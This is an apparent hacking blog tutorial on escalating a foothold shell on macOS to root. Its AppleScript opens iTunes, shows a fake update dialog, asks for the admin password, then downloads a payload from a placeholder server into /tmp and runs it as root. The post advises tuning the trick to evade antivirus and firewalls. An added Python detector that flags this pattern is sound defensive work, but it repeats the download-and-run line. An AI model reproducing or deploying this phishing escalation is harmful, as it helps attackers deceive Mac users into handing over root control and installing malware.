So, now we know how to get an ordinary shell on OSX, what about root? Luckily for us, we can do a couple of tricks with AppleScript.
You will need a Mac, and a Kali machine for this, so if you have that lined up, go read on :)
So, if you've read the first part, Applescript trojan in PDF files, let's move on and write a script to try and trick the user into granting us root privs :)
I assume you already have a shell on the system; a plain user shell is enough. What we'll write is some Applescript that we can run from that shell, which tries to trick the user into granting us system / admin privileges and then downloads a second payload, this time running as root. So, first we need an app for MacOS. Open Script Editor and make something like this.
-- Open iTunes first so the dialog that follows looks like it belongs to it
do shell script "open -a itunes.app"
-- The lure text shown to the user
set DialogText to "Itunes needs to update, Press OK to continue" & "."
display dialog DialogText
-- "with administrator privileges" makes macOS show its admin password prompt; if the user authenticates, the download-and-run below executes as root
do shell script "curl -s http://PAYLOAD_SERVER/PAYLOAD_FILE >>/tmp/PAYLOAD_FILE;cd /tmp;chmod +x PAYLOAD_FILE;./PAYLOAD_FILE" with administrator privileges
Compile it and save it as an app file, then move it somewhere you can download it from, or if you're using some kind of C2, just save it on your workstation.
Then simply, from an ordinary user shell, upload it to the target and run it from Bash using "open -a payload.app".
It will open Itunes on the user's desktop, tell the user that Itunes needs to run updates, and prompt for the admin password. If the user types the password, the script continues with installing the payload as root, giving us a shell back, this time as root.
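From the defender's side, the script above has a recognisable shape: a lure dialog, a "do shell script ... with administrator privileges" call, and a download-and-run from /tmp in that same privileged call. The following Python is an added example, not code from the original post, that flags that combination in AppleScript source (for a compiled .scpt, export the source first, e.g. with osadecompile on the Mac); the two sample scripts are constructed for the demo.

```python
import re

# Indicators of the admin-prompt phishing pattern described in the post.
ADMIN_PRIVS = re.compile(r"with\s+administrator\s+privileges", re.I)
LURE_DIALOG = re.compile(r"\bdisplay\s+dialog\b", re.I)
REMOTE_FETCH = re.compile(r"\b(curl|wget|nscurl)\b[^\n]*https?://", re.I)
TMP_EXEC = re.compile(r"/tmp\b.*chmod\s+\+x|chmod\s+\+x.*/tmp\b", re.I)
SHELL_CALL = re.compile(r"\bdo\s+shell\s+script\b", re.I)


def analyze_applescript(source: str) -> dict:
    """Return indicator flags and a verdict for one AppleScript source text."""
    shell_lines = [ln for ln in source.splitlines() if SHELL_CALL.search(ln)]
    # Only shell calls that request admin privileges matter for the verdict.
    admin_shell = [ln for ln in shell_lines if ADMIN_PRIVS.search(ln)]
    findings = {
        "lure_dialog": bool(LURE_DIALOG.search(source)),
        "admin_privileges": bool(admin_shell),
        "remote_fetch_as_admin": any(REMOTE_FETCH.search(ln) for ln in admin_shell),
        "tmp_exec_as_admin": any(TMP_EXEC.search(ln) for ln in admin_shell),
    }
    # A bare admin prompt is normal in legitimate installer scripts; the
    # combination with a lure and a privileged download-and-run is the phish.
    privileged_fetch = findings["remote_fetch_as_admin"] or findings["tmp_exec_as_admin"]
    if findings["admin_privileges"] and privileged_fetch:
        findings["verdict"] = "malicious-likely" if findings["lure_dialog"] else "suspicious"
    elif findings["admin_privileges"]:
        findings["verdict"] = "review"
    else:
        findings["verdict"] = "benign"
    return findings


# Constructed sample mirroring the shape of the script in the post.
PHISH_SAMPLE = '''do shell script "open -a itunes.app"
set DialogText to "Itunes needs to update, Press OK to continue" & "."
display dialog DialogText
do shell script "curl -s http://PAYLOAD_SERVER/PAYLOAD_FILE >>/tmp/PAYLOAD_FILE;cd /tmp;chmod +x PAYLOAD_FILE;./PAYLOAD_FILE" with administrator privileges
'''

# Constructed sample of a legitimate-looking installer helper: admin prompt, no download.
INSTALLER_SAMPLE = '''display dialog "Install the helper tool?"
do shell script "/usr/sbin/installer -pkg /Volumes/App/App.pkg -target /" with administrator privileges
'''

if __name__ == "__main__":
    for name, src in (("phish", PHISH_SAMPLE), ("installer", INSTALLER_SAMPLE)):
        print(name, analyze_applescript(src))
```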
This can be adjusted endlessly, trying different combinations and social engineering tricks against the user, and of course, test it against AntiVirus solutions and firewalls and adjust as needed.
Remember, this is just a basic example, the rest is up to you, dear reader to try out :)
Much Happy OSX Hacking